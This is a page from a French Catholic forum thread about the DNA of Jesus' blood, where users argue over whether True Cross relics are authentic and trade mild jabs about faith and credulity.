Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!

Oui.



Charles Rohault de Fleury, avocat passionné de la cause sacrée des reliques[24] a fait l'inventaire de tous les fragments de la croix de par le monde et des autres reliques de la Passion. Tout ce qu'il a pu recueillir est loin d'égaler le dixième du volume de la Vraie Croix tant les fragments sont modestes, voire minuscules. L'incrédulité à l'égard de la véracité d'une partie ou de tous les morceaux de la Vraie Croix semble donc avoir entraîné une surestimation du nombre de reliques identifiée comme telle et comparée avec ironie à une « forêt »[25].

Ces critiques, même si elles peuvent paraître exagérées, sont cependant historiquement fondées. Car même si l'ensemble des reliques conservées à ce jour ne représente pas une quantité supérieure à celle d'une croix telle qu'elle aurait pu exister au ier siècle de notre ère, cela ne signifie pas pour autant qu'elles sont toutes d'authentiques fragments de bois découverts à Jérusalem au début du ive siècle
.


https://fr.wikipedia.org/wiki/Vraie_Croix

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
florence_yvonne

avatar

Féminin Messages : 6602
Inscription : 12/02/2007

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Lun 16 Avr 2018, 18:09

RenéMatheux a écrit:
Citation :
Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!

C'est un fait établi.

_________________
"La religion est une affaire entre chaque homme et la divinité."
(Pierre Bayle / 1647-1706)
Revenir en haut Aller en bas
http://www.forum-religions.org/
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Lun 16 Avr 2018, 19:09

Le trafique des fausses reliques n 'est pas vraiment le sujet de ce topic ,si?
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mar 17 Avr 2018, 00:12

florence_yvonne a écrit:
RenéMatheux a écrit:
Citation :
Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!

C'est un fait établi.

en fait, on pourrait peut etre meme constuire plusieurs arche de Noé.
J ai personnellement rencontré deux fois des vendeurs de Bout de La Vraie Croix.

et j ai meme connu un gars qui en avait un , emballé dans une receptacle et a sa mort, ses parents l ont ouvert et trouvé un morceau de gravier emballé dans du coton hydrophile...
Y aurait pas tant d escroc et de voleurs si y avait pas tant de gens crédules.

Eduquons les gens, c est le meilleur remede contre les tartuffes et les charlatans qui veulent nous faire prendre les vessies pour des lanternes.

Et en attendant, testons l ADN soi disant de Jesus, afin de faire le tri entre le vrai du faux.
Revenir en haut Aller en bas
RenéMatheux



Masculin Messages : 16302
Inscription : 28/06/2008

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mar 17 Avr 2018, 11:50

florence_yvonne a écrit:
RenéMatheux a écrit:
Citation :
Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!

C'est un fait établi.
Tiens donc!
Par qui?
Références?
Revenir en haut Aller en bas
RenéMatheux



Masculin Messages : 16302
Inscription : 28/06/2008

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mar 17 Avr 2018, 11:53

Bassmeg a écrit:

et j ai meme connu un gars qui en avait un , emballé dans une receptacle et a sa mort, ses parents l ont ouvert et trouvé un morceau de gravier emballé dans du coton hydrophile....
Bassmeg connait toujours des faits qui peuvent démolir la foi! Thumbdown
Bassmeg a écrit:

Eduquons les gens, c est le meilleur remede contre les tartuffes et les charlatans qui veulent nous faire prendre les vessies pour des lanternes.
Très bien! Comme cela ils ne croiront plus les gens du type bassmeg! siffler rambo Shocked
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mar 17 Avr 2018, 15:19

Bassmeg a écrit:
florence_yvonne a écrit:
RenéMatheux a écrit:
Citation :
Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!

C'est un fait établi.

en fait, on pourrait peut etre meme constuire plusieurs arche de Noé.
J ai personnellement rencontré deux fois des vendeurs de Bout de La Vraie Croix.

et j ai meme connu un gars qui en avait un , emballé dans une receptacle et a sa mort, ses parents l ont ouvert et trouvé un morceau de gravier emballé dans du coton hydrophile...
Y aurait pas tant d escroc et de voleurs si y avait pas tant de gens crédules.

Eduquons les gens, c est le meilleur remede contre les tartuffes et les charlatans qui veulent nous faire prendre les vessies pour des lanternes.

Et en attendant, testons l ADN soi disant de Jesus, afin de faire le tri entre le vrai du faux.

commencez par vous éduquer avant de vouloir éduquer les autres et faire croire que vous savez plus que tout le monde.

Les Saints, les Docteurs de l'Eglise sont des tartuffes et des charlatans maintenant ? Vous, vous avez l'art de faire prendre des vessies pour des lanternes.

Je vais encore être accusée de vous avoir insultée, alors que tous vos posts ne sont que cela, envers les membres qui ne sont pas de votre avis.

Vous aurez encore quelqu'un en moins bientôt, car je compte me désinscrire de ce cirque.
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mar 17 Avr 2018, 16:01

Bassmeg a écrit:
Citation :





Qui est le père de Jésus à ton avis ? Ton avis en tant que catholique.

Je ne sais pas. J ai pas de honte a l avouer. C est OK de pas savoir, parfois, plutôt que de pretendre SAVOIR des choses qu en fait on ne SAIT pas, mais qu on ne fait que CROIRE.
Ca me parait plus honnete comme attitude, intellectuellement parlant.

et toi, tu penses quoi sur cette question de l identité du pere de Jésus?
L analyse permettrait d y voir plus clair, comme pour le drap de turin.

Alors là, je n'avais pas vu ! ça m'en bouche un coin que vous dites ne PAS SAVOIR qui est le PERE de Jésus et vous afficher en tant que catholique sur ce forum.

Donc, vous n'avez pas la foi. Ce serait plus honnête de le dire.

(encore une insulte sans doute !)

Donc, en tant que Immaculée Conception, vous ne SAVEZ RIEN non plus.

Avouez le au moins.
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Jeu 19 Avr 2018, 00:46

RenéMatheux a écrit:

Bassmeg a écrit:

Eduquons les gens, c est le meilleur remede contre les tartuffes et les charlatans qui veulent nous faire prendre les vessies pour des lanternes.
Très bien! Comme cela ils ne croiront plus les gens du type bassmeg! siffler rambo Shocked

éduquons les gens en mathématiques niveau primaire
et comme ca ils ne croieront plus ceux qui se proclament matheux sur parole.
(perso, je me souviens t avoir piqué trois fois sur des erreurs de calculs basiques...alors que je suis la remiere a reconnaître que j ai pas le niveauen math, meme si je travaille...) Thumright
revenons au sujet
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Jeu 19 Avr 2018, 00:53

blanche neige a écrit:
Bassmeg a écrit:
florence_yvonne a écrit:
RenéMatheux a écrit:

Z'en savez rien!

C'est un fait établi.

en fait, on pourrait peut etre meme constuire plusieurs arche de Noé.
J ai personnellement rencontré deux fois des vendeurs de Bout de La Vraie Croix.

et j ai meme connu un gars qui en avait un , emballé dans une receptacle et a sa mort, ses parents l ont ouvert et trouvé un morceau de gravier emballé dans du coton hydrophile...
Y aurait pas tant d escroc et de voleurs si y avait pas tant de gens crédules.

Eduquons les gens, c est le meilleur remede contre les tartuffes et les charlatans qui veulent nous faire prendre les vessies pour des lanternes.
Et en attendant, testons l ADN soi disant de Jesus, afin de faire le tri entre le vrai du faux.
commencez par vous éduquer avant de vouloir éduquer les autres et faire croire que vous savez plus que tout le monde.
Les Saints, les Docteurs de l'Eglise sont des tartuffes et des charlatans maintenant ? Vous, vous avez l'art de faire prendre des vessies pour des lanternes.
Je vais encore être accusée de vous avoir insultée, alors que tous vos posts ne sont que cela, envers les membres qui ne sont pas de votre avis.
Vous aurez encore quelqu'un en moins bientôt, car je compte me désinscrire de ce cirque.

Blanche, je suis vraiment désolée si mes opinions te choquent, ca m arrive souvent moi aussi d etre choquée par les opinions d autres croyants. Je sais ce que c est.

Pour repondre a ce que tu me disais,
je crois pas que les saints et les docteurs de l eglise soient des charlatans ou quoi que ce soit.
Merci de pas me faire tenir des positions que je ne tiens pas.

et pour en revenir au sujet, si vraiment on a de l adn christique, les résultats vont bouleverser le monde.
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Jeu 19 Avr 2018, 01:01

je vais être amusant !

le père de Jésus

c'est Abba cheers



ok je sors

et bonne nuit
Revenir en haut Aller en bas
Contenu sponsorisé




MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   

Revenir en haut Aller en bas
 
L'ADN du SANG de Jésus de Nazareth
Revenir en haut 
Page 1 sur 4Aller à la page : 1, 2, 3, 4  Suivant
 Sujets similaires
-
» Prière pour se libérer des liens mauvais !
» Le sang du christ un roman qui m'a choquée
» Fête du Saint Sacrement du Corps et du Sang du Christ, commentaire du jour "Le pain des anges,..."
» Juillet : Mois du Très Précieux Sang de Jésus
» Sang desséché, corne broyée... pour les fruits et légumes

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE :: Témoignages, discernement, cas concrets ╬-
Sauter vers: